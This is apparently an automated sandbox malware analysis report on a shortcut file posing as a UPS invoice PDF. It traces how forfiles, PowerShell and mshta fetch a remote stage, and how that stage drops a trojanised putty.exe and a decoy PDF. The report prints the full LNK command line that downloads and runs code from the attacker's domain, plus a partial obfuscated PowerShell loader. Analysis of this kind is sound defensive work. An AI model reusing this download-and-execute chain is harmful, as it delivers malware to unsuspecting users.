Source: mshta.exe, 00000004.00000003.1790203146.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792575197.0000023797681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...8
Source: mshta.exe, 00000004.00000003.1787060368.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793563743.0000023F9A1A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788076442.0000023F9A1A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790777524.0000023F9A1A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...w
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/I
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage6
Source: mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792606600.00000237976B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1787859516.00000237976AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781945206.00000237976AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageC:
Source: mshta.exe, 00000004.00000002.1792236967.0000023797580000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageH
Source: mshta.exe, 00000004.00000002.1792262251.0000023797590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageLE_STRINGj
Source: mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageMI
Source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageYYC:
Source: mshta.exe, 00000004.00000002.1792396309.00000237975E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagees#M
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagegs
Source: mshta.exe, 00000004.00000003.1789392993.0000023F9FAA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagehttps://nebulaquestcorporation.cc/cdnusa/inv
Source: forfiles.exe, 00000001.00000002.1527302987.00000229F2D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagero
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/putty.exep
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf0
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe, 0000000C.00000000.1637581496.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe.7.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785DB950 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,12_2_00007FF6785DB950
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D7060 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA,12_2_00007FF6785D7060
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D85D0 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,GlobalFree,GlobalFree,12_2_00007FF6785D85D0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D1EED ShowCursor,GetCursorPos,MonitorFromPoint,GetMonitorInfoA,IsZoomed,GetWindowLongPtrA,SendMessageA,GetKeyboardState,GetKeyboardState,GetMessageTime,ReleaseCapture,SetCapture

System Summary

Source: Process Memory Space: powershell.exe PID: 4620, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\putty.exe
Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 3325
Source: Invoice-UPS-218931.pdf.lnk.mal.lnk | LNK file: /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67861BD50
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D53E3
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DCB24
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F2C60
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67860AEF4
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F6F7C
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F65F0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DB9B0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786AF964
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67868F9DC
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786B1A94
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67860DA70
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864BB20
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67869BB90
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F3C20
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678617C30
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678651CB0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D7D50
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864DE20
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D9E00
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786ADDF8
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678623EA0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67860FE90
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864FE60
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D1EED
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DA01E
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DA032
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E4030
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D6080
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DA03E
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786B60D4
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A51A8
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D1160
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67860D150
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864F230
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D11BB
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DF280
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67860F260
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E1330
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678605310
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786232EC
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864D2D0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DD2D0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678693384
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678619430
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864D430
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D1426
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67865D410
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D7410
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D93C0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A5490
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678649480
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E4A80
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786515A0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F1560
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67860F550
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786176A0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E3650
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F3700
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678601780
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DD810
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67869F804
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786A5888
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E5890
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67869387C
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D9920
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786158D0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678616A00
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864A9C0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678622A80
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678690A48
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E0B00
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678652B10
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678614B00
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785FAAF0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67868EB94
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678690C30
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F4C30
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678696CA4
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785ECDA0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DED80
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678628E20
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678690E18
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864EE10
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678692E80
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678650F20
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786AAEC8
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678616F90
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67862B020
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678607010
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678646FE0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785FF060
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678649120
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864E170
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678696144
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67865E3A0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E6374
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678690484
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785FA440
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678646590
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67864E540
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67868E5FC
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D85D0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785EA680
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6786B8678
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678690670
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785E2700
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678698748
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67865A830
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785F882D
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67862E7D0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF67869085C
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF678625360 appears 66 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67869B8AC appears 457 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF6785FC110 appears 48 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67861A3A0 appears 38 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67860CD00 appears 40 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF678626360 appears 62 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67869FC60 appears 60 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67864A5D0 appears 78 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF6786A2CE8 appears 33 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF678612890 appears 137 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67864BFC0 appears 36 times
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: String function: 00007FF67860CC30 appears 150 times
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Process Memory Space: powershell.exe PID: 4620, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000007.00000002.1770606726.000001FB69820000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .CMD;.VBpt
Source: classification engine | Classification label: mal100.evad.winLNK@27/54@1/3
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678617AD0 FormatMessageA,GetLastError
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785FAA80 CoCreateInstance
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785DD100 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cykvzpzj.1pm.ps1
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Invoice-UPS-218931.pdf.lnk.mal.lnk | ReversingLabs: Detection: 21%
Source: putty.exe | String found in binary or memory: config-serial-stopbits
Source: putty.exe | String found in binary or memory: config-ssh-portfwd-address-family
Source: putty.exe | String found in binary or memory: config-address-family
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('<hex-encoded payload argument omitted>');$fcuYB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
